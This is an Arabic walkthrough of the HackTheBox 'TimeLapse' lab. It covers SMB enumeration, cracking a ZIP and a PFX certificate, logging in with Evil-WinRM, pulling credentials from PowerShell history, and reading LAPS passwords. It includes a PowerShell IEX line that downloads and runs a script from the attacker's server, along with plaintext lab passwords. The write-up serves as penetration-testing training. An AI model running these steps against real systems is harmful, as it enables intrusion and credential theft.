> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/writeups-ctf/hackthebox/windows-easy/timelapse-hackthebox-writeup.md).

# شرح TimeLapse HackTheBox

{% embed url="<https://app.hackthebox.com/machines/452>" %}

{% hint style="warning" %}
**المهارات:**

* استكشاف SMB
* كسر حماية ملف ZIP المحمي بكلمة مرور (fcrackzip)
* كسر وقراءة ملف .PFX (crackpkcs12)
* الحصول على وصول SSL باستخدام Evil-WinRM
* تسريب معلومات - قراءة سجل Powershell الخاص بالمستخدم (الانتقال عبر المستخدم)
* استغلال LAPS للحصول على كلمات المرور (Get-LAPSPasswords.ps1) (تصعيد الامتيازات)
  {% endhint %}

## الاستطلاع <a href="#reconnaissance" id="reconnaissance"></a>

**إعداد مساحة العمل:**

قم بإعداد مساحة العمل بإنشاء ثلاثة مجلدات لتخزين المحتوى المهم، والاستغلالات، ونتائج استطلاع Nmap.<br>

<figure><img src="/files/0917ff7a3b8b8b29104a53656834e5948c6776eb" alt=""><figcaption></figcaption></figure>

**فحص اتصال VPN**

تحقق من اتصال VPN لضمان تواصل مستقر مع الجهاز المستهدف.

<figure><img src="/files/610aff241f9e671bb7ce4320ae5f606cdcb8113a" alt=""><figcaption></figcaption></figure>

**اكتشاف المنافذ المفتوحة باستخدام Nmap:**

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.152 -oG allPorts
```

<figure><img src="/files/ca6342accc566ee2b78b10870ca433060f9d6701" alt=""><figcaption></figcaption></figure>

**تحليل المنافذ المفتوحة باستخدام extractport:**/ باستخدام دالة extractport لعرض المنافذ المفتوحة بصيغة موجزة ونسخها إلى الحافظة.

<figure><img src="/files/706faf6b208dc2daea658f9138840415158648fb" alt=""><figcaption></figcaption></figure>

**فحص إصدار المنافذ باستخدام Nmap:**/ استخدم Nmap لفحص إصدارات الخدمات وحفظ المخرجات في ملف "targeted":

```bash
nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49726,59126 10.10.11.152 -oN targeted
```

<figure><img src="/files/d7c571c2865a17176c0919c7de85951530431e32" alt=""><figcaption></figcaption></figure>

#### إعداد ملف /etc/hosts لحلّ DNS.

<figure><img src="/files/0f05ead2ca9b34d2d2b7057db0511ca11e408067" alt=""><figcaption></figcaption></figure>

## **الاستطلاع والاستغلال:**

### تحديد اسم الجهاز والنطاق

استخدام CrackMapExec لتحديد اسم الجهاز ونطاقه.

```bash
crackmapexec smb 10.10.11.152
```

<figure><img src="/files/2ee5cebabb9e6d3911c690ef868717608c01e3a7" alt=""><figcaption></figcaption></figure>

### عرض الملفات المشتركة عبر SMB:

استخدام smbclient و smbmap لعرض الملفات المشتركة.

```bash
smbclient -L 10.10.11.152 -N
```

<figure><img src="/files/98ea77401aaed42a98df8d33cea55e55025cb4c2" alt=""><figcaption></figcaption></figure>

```bash
smbmap -H 10.10.11.152 -u 'null'
```

<figure><img src="/files/c7b279110125fed4d93f58c071becb59abdc808d" alt=""><figcaption></figcaption></figure>

### **الوصول إلى المجلد المشترك واكتشاف ملف ZIP محمي بكلمة مرور**

استكشاف وتحديد الملفات في المجلد المشترك، مما كشف عن ملف ZIP محمي.

```bash
smbclient //10.10.11.152/Shares -N
```

<figure><img src="/files/02b31a24a1795288ffe10babd90a57d04b501959" alt=""><figcaption></figcaption></figure>

### **كسر ملف ZIP باستخدام fcrackzip**

استخدام fcrackzip لمحاولة العثور على كلمة مرور ملف ZIP.

```bash
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip
```

<figure><img src="/files/a2291c2ec847799a98b8fc2639cda666edc829f6" alt=""><figcaption></figcaption></figure>

### **الاستخراج من ملف PFX**

<figure><img src="/files/00cf7a3bccf6aaa0939550cc3545607c7177648e" alt=""><figcaption></figcaption></figure>

```bash
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
```

<figure><img src="/files/ca2e3ee6d0c0f40b395b7ed009620fb62ed006f9" alt=""><figcaption></figcaption></figure>

### **كسر كلمة مرور ملف PFX:**

#### لكسر ملف pfx عبر كسر كلمة المرور، سيتم استخدام الأداة crackpkcs12.

{% embed url="<https://github.com/crackpkcs12/crackpkcs12>" %}

```bash
crackpkcs12 -d /usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx
```

<figure><img src="/files/1bf8617eb3f4666ff4cf159ad20f35103dc9f141" alt=""><figcaption></figcaption></figure>

### **الحصول على المفتاح الخاص والشهادة من ملف PFX**

استرجاع المفتاح الخاص

<figure><img src="/files/55846e98417b4a0bc8d98ca14c42344617d65350" alt=""><figcaption></figcaption></figure>

استرجاع الشهادة

```bash
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
```

<figure><img src="/files/1cd1bc6feb67349c33c9145bb8b711010eafb89a" alt=""><figcaption></figcaption></figure>

### **اتصال SSL مع Evil-WinRM باستخدام المفتاح الخاص والشهادة**

<figure><img src="/files/735449c9a2392454d15a4d4b8c4e2cd3ece05b18" alt=""><figcaption></figcaption></figure>

```bash
evil-winrm -i 10.10.11.152 -c certificate.pem -k priv-key.pem -S
```

<figure><img src="/files/acdd33a68a215020edbb4e92263b8b52840a529a" alt=""><figcaption></figcaption></figure>

### **الحصول على العلم الأول**

الحصول على العلم الأول، "user.txt"

<figure><img src="/files/cee8aa0f28894f855b0f499c99488854845660e1" alt=""><figcaption></figcaption></figure>

## تصعيد الامتيازات:

**عرض مستخدمي DC والامتيازات باستخدام net users و whoami /priv**

تحديد المستخدمين والامتيازات على وحدة تحكم النطاق.

<figure><img src="/files/e4f5b1d6df282dca6e1c1e9a3cec13135d16a837" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/192b28229e9ff8455e592e7bd86b24e4117a6dca" alt=""><figcaption></figcaption></figure>

#### **تحليل مجموعات المستخدمين واكتشاف عضوية المستخدم "svc/ deploy" في مجموعة "LAPS/ Readers"**

<figure><img src="/files/5bcd7e78ecc387dd046554415065c8f54a545fd0" alt=""><figcaption></figcaption></figure>

#### **الحصول على كلمة مرور المستخدم "svc/ deploy" بقراءة سجل PowerShell**

```bash
type AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
```

<figure><img src="/files/c58b68fe4e1d68f82f67fb82a61ea735db5a201b" alt=""><figcaption></figcaption></figure>

### **التحقق من كلمة المرور باستخدام CrackMapExec**

تأكيد صلاحية كلمة المرور تم الحصول عليه باستخدام CrackMapExec.

```bash
crackmapexec smb 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV'
```

<figure><img src="/files/7e2ea221b99e2475a0d6de9d8abe41a3eb743208" alt=""><figcaption></figcaption></figure>

### **تسجيل الدخول إلى Evil-WinRM باستخدام بيانات اعتماد المستخدم "svc/ deploy"**

الاتصال بالنظام البعيد باستخدام بيانات اعتماد المستخدم "svc/ deploy" عبر Evil-WinRM.

<pre class="language-bash"><code class="lang-bash"><strong>evil-winrm -i 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
</strong></code></pre>

<figure><img src="/files/c40d71be0b7daa0a4cd3aca74f0569adb0509032" alt=""><figcaption></figcaption></figure>

### **استخدام Get-LAPSPasswords لاستخراج كلمات المرور**

{% embed url="<https://github.com/kfosaaen/Get-LAPSPasswords>" %}

#### **تنزيل سكربت Get-LAPSPasswords**

```bash
python3 -m http.server 80
```

```bash
IEX(New-object Net.WebClient).downloadString('http://10.10.16.4/Get-LAPSPasswords.ps1')
```

<figure><img src="/files/e5557e0a2c288f0946a746357937297731622b2d" alt=""><figcaption></figcaption></figure>

### **تنفيذ السكربت واسترجاع كلمات مرور الإدارة**

<figure><img src="/files/bdc9240c264ad8f31b14085a79b983c655751757" alt=""><figcaption></figcaption></figure>

### **التحقق من كلمة مرور الإدارة باستخدام CrackMapExec**

تأكيد صلاحية كلمة المرور تم الحصول عليه باستخدام CrackMapExec من حساب المستخدم Administrator.

```basic
crackmapexec smb 10.10.11.152 -u 'Administrator' -p '32x3WwoM$8}nr+jw0Z(wz)[@'
```

<figure><img src="/files/f1622c9e864548c20543764ae50fbcf0bcca3ba9" alt=""><figcaption></figcaption></figure>

### **الاتصال النهائي عبر Evil-WinRM باستخدام بيانات اعتماد المدير**

الاتصال النهائي بالنظام باستخدام بيانات اعتماد الإدارة عبر Evil-WinRM.

```bash
evil-winrm -i 10.10.11.152 -u 'Administrator' -p '32x3WwoM$8}nr+jw0Z(wz)[@' -S
```

<figure><img src="/files/5e8413ae7502c58280d4a48983fbf9d54c6a2dd3" alt=""><figcaption></figcaption></figure>

### **تم الحصول على العلم النهائي :)**

<figure><img src="/files/b8ed05329c3b396dd471e08969fc0fe33b0edc6b" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/86e7447acafdb598d24b5706bb31276166efe604" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/writeups-ctf/hackthebox/windows-easy/timelapse-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
